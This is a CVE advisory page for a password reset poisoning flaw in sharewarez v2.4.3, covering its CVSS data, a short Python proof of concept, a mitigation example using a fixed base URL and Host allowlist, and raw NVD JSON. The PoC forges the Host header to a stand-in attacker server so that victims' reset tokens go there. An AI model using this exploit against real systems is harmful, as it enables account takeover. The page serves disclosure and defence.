Security Vulnerability Report
CVE-2025-61136 CVSS 7.1 HIGH

Published: 2025-10-23 15:15:44
Last Modified: 2026-04-15 00:35:42

Description

A Host Header Injection vulnerability in the password reset component in axewater sharewarez v2.4.3 allows remote attackers to conduct password reset poisoning and account takeover via manipulation of the Host header when Flask's url_for(_external=True) generates reset links without a fixed SERVER_NAME.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

axewater sharewarez v2.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-61136 Password Reset Poisoning PoC
# Target: axewater sharewarez v2.4.3
target_url = "http://target-server.com"
attacker_server = "http://attacker-controlled-server.com"
victim_email = "[email protected]"

# Step 1: Send password reset request with malicious Host header
endpoint = f"{target_url}/forgot-password"
headers = {
    "Host": "attacker-controlled-server.com",  # Malicious Host header
    "Content-Type": "application/x-www-form-urlencoded"
}
payload = {"email": victim_email}

response = requests.post(endpoint, data=payload, headers=headers)
print(f"[*] Password reset request sent to {victim_email}")
print(f"[*] Response status: {response.status_code}")

# Step 2: Attacker receives the reset link on their server
# The victim will receive an email with a link like:
# http://attacker-controlled-server.com/reset-password?token=XXX

# Step 3: Once attacker captures the token, they can reset the password
reset_endpoint = f"http://attacker-controlled-server.com/reset-password"
print(f"[*] Attacker should set up listener on {reset_endpoint}")
```
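One way to close the weakness described above, as an added example that is not code from sharewarez or from this record: build the reset link from a configured base URL instead of the request's Host header, and reject requests whose Host is not on an allowlist. `PUBLIC_BASE_URL`, `ALLOWED_HOSTS`, `HostAllowlist`, `build_reset_link`, the stand-in handler and the sample hostname are hypothetical; the `/forgot-password` and `/reset-password?token=` paths are the ones shown in the PoC above.

```python
from urllib.parse import urlencode, urlsplit

# Assumed deployment values (hypothetical, not taken from sharewarez).
PUBLIC_BASE_URL = "https://sharewarez.example.org"
ALLOWED_HOSTS = {urlsplit(PUBLIC_BASE_URL).netloc.lower()}


def build_reset_link(token, base_url=PUBLIC_BASE_URL):
    """Build the link from configuration, never from the request's Host."""
    query = urlencode({"token": token})
    return f"{base_url.rstrip('/')}/reset-password?{query}"


class HostAllowlist:
    """WSGI middleware: answer 400 unless Host is on the allowlist."""

    def __init__(self, app, allowed_hosts=ALLOWED_HOSTS):
        self.app = app
        self.allowed = {h.lower() for h in allowed_hosts}

    def __call__(self, environ, start_response):
        # X-Forwarded-Host matters once a proxy-fix layer makes the app trust it.
        names = [environ.get("HTTP_HOST", ""), environ.get("HTTP_X_FORWARDED_HOST")]
        if any(n is not None and n.strip().lower() not in self.allowed for n in names):
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [b"invalid Host header\n"]
        return self.app(environ, start_response)


def forgot_password_app(environ, start_response):
    """Stand-in for the reset handler: returns the link it would e-mail."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [build_reset_link("CONSTRUCTED-TOKEN").encode()]


def simulate(host, forwarded_host=None):
    """Send one constructed request through the middleware; return (status, body)."""
    environ = {"REQUEST_METHOD": "POST", "PATH_INFO": "/forgot-password", "HTTP_HOST": host}
    if forwarded_host is not None:
        environ["HTTP_X_FORWARDED_HOST"] = forwarded_host
    seen = []
    body = HostAllowlist(forgot_password_app)(environ, lambda status, headers: seen.append(status))
    return seen[0], b"".join(body).decode()


if __name__ == "__main__":
    for h in ("sharewarez.example.org", "attacker-controlled-server.com"):
        print(h, "->", simulate(h))
```

In a Flask application the middleware would be installed with `app.wsgi_app = HostAllowlist(app.wsgi_app)`, and setting a fixed `SERVER_NAME` addresses the condition named in the description.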

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61136", "sourceIdentifier": "[email protected]", "published": "2025-10-23T15:15:44.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Host Header Injection vulnerability in the password reset component in axewater sharewarez v2.4.3 allows remote attackers to conduct password reset poisoning and account takeover via manipulation of the Host header when Flask's url_for(_external=True) generates reset links without a fixed SERVER_NAME."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://drive.google.com/file/d/15X5L1uEqgWOLrjKqm96cEPAWp2ph0zJp/view?usp=sharing", "source": "[email protected]"}, {"url": "https://gist.github.com/BrookeYangRui/145e529b5fd4f56af299efde37edf4fa", "source": "[email protected]"}, {"url": "https://github.com/axewater/sharewarez/blob/d04c90b7dc3fbae1596f731d1b168d3fb9fdd2df/modules/routes_login.py#L188-L217", "source": "[email protected]"}, {"url": "https://github.com/axewater/sharewarez/blob/d04c90b7dc3fbae1596f731d1b168d3fb9fdd2df/modules/utils_smtp.py#L191-L206", "source": "[email protected]"}, {"url": "https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning", "source": "[email protected]"}]}}